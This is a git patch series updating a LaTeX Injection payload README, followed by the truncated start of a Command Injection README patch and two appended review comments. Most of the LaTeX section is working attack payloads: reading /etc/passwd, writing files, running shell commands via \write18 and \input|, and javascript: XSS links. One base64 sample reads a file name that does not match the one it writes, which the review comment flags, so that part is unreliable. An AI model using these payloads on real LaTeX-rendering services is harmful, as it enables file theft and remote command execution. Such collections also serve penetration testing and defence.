From 1865b8a85bb7d8b945d7dc3e23af5990260628f2 Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Wed, 29 Sep 2021 07:28:11 +0200 Subject: [PATCH 1/2] Update README.md --- LaTeX Injection/README.md | 43 +++++++++++++++++++++++---------------- 1 file changed, 25 insertions(+), 18 deletions(-) diff --git a/LaTeX Injection/README.md b/LaTeX Injection/README.md index 5cce2b7..6c9d9cb 100644 --- a/LaTeX Injection/README.md +++ b/LaTeX Injection/README.md @@ -2,14 +2,16 @@ ## Read file -```bash +Read file and interpret the LaTeX code in it: + +```tex \input{/etc/passwd} -\include{password} # load .tex file +\include{somefile} # load .tex file (somefile.tex) ``` -Read single lined file +Read single lined file: -```bash +```tex \newread\file \openin\file=/etc/issue \read\file to\line @@ -17,9 +19,9 @@ Read single lined file \closein\file ``` -Read multiple lined file +Read multiple lined file: -```bash +```tex \newread\file \openin\file=/etc/passwd \loop\unless\ifeof\file 
@@ -29,47 +31,52 @@ Read multiple lined file \closein\file ``` -Read text file, keep the formatting +Read text file, **without** interpreting the content, it will only paste raw file content: -```bash +```tex \usepackage{verbatim} \verbatiminput{/etc/passwd} ``` ## Write file -```bash +Write single lined file: + +```tex \newwrite\outfile \openout\outfile=cmd.tex \write\outfile{Hello-world} +\write\outfile{Line 2} +\write\outfile{I like trains} \closeout\outfile ``` ## Command execution -The input of the command will be redirected to stdin, use a temp file to get it. +The output of the command will be redirected to stdout, therefore you need to use a temp file to get it. -```bash -\immediate\write18{env > output} +```tex +\immediate\write18{id > output} \input{output} ``` -If you get any LaTex error, consider using base64 to get the result without bad characters +If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`): -```bash +```tex \immediate\write18{env | base64 > test.tex} \input{text.tex} ``` -```bash -\input|ls|base4 +```tex +\input|ls|base64 \input{|"/bin/hostname"} ``` ## Cross Site Scripting From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) -```bash + +```tex \url{javascript:alert(1)} \href{javascript:alert(1)}{placeholder} ``` @@ -80,4 +87,4 @@ Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{ * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) -* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) \ No newline at end of file +* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) From 173e34ede01bea806ee330529e6abf5b270e4f3b Mon Sep 17 00:00:00 2001 
From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Wed, 29 Sep 2021 07:39:07 +0200 Subject: [PATCH 2/2] Fixed arrow characters in shell prompts for clarity Fixed arrow characters in shell prompts for clarity --- Command Injection/README.md | 40 ++++++++++++++++++------------------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/Command Injection/README.md b/Command Injection/README.md index c309ec1..a4e0d0b 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -71,23 +71,23 @@ Works on Linux only. swissky@crashlab:~/Www$ cat
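Review bot: the inline comment in the first hunk of patch 1, `\include{somefile} # load .tex file (somefile.tex)`, uses `#` as a comment marker, but in TeX `#` is the macro parameter character and `%` starts a comment, so now that the fence is `tex` the line as written would fail if pasted into a document. Suggest `\include{somefile} % load .tex file (somefile.tex)`, and the same fix applies to any other `#` comments kept inside `tex` fences.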
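Review bot: in the base64 example of the second hunk of patch 1, the command writes to `test.tex` but the following line reads `\input{text.tex}`, so the sample cannot work as written; the two names should match (`\input{test.tex}`). The same hunk should also state that `\write18` and the `\input|...` form only run when the TeX engine is started with shell escape enabled (`--shell-escape`, or `shell_escape=t` in `texmf.cnf`); the default restricted mode only allows an allowlisted set of programs, which is the configuration a defender should keep. Minor: `LaTex` in the prose should be `LaTeX`, and `Read text file, **without** interpreting the content, it will only paste raw file content:` would read better as `Read a text file without interpreting it (the raw content is pasted verbatim):`.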